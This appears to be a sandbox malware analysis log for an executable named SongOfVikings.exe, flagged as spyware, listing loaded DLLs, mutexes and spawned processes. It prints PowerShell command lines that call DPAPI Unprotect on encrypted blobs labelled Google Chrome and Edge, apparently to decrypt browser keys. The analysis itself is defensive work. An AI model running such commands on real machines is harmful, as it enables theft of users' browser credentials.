Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d12core.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dxilconv.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: d3dscache.dll
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: twinapi.appcore.dll

Uses 32bit PE files

Source: SongOfVikings.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal56.spyw.winEXE@28/110@3/3

Source: C:\Users\user\Desktop\SongOfVikings.exe

0_2_0040338F

Source: C:\Users\user\Desktop\SongOfVikings.exe

Code function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404722

Source: C:\Users\user\Desktop\SongOfVikings.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\SongOfVikings.exe

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Users\user\Desktop\SongOfVikings.exe	Mutant created: \Sessions\1\BaseNamedObjects\cdf7078b-99f0-53cc-bffc-b945975ddd33
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03

Source: C:\Users\user\Desktop\SongOfVikings.exe

File created: C:\Users\user\AppData\Local\Temp\nsyF296.tmp

Jump to behavior

Source: SongOfVikings.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\SongOfVikings.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SongOfVikings.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SELECT name FROM sqlite_master WHERE type='table';

Source: C:\Users\user\Desktop\SongOfVikings.exe

File read: C:\Users\user\Desktop\SongOfVikings.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SongOfVikings.exe "C:\Users\user\Desktop\SongOfVikings.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe"
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')"	Jump to behavior
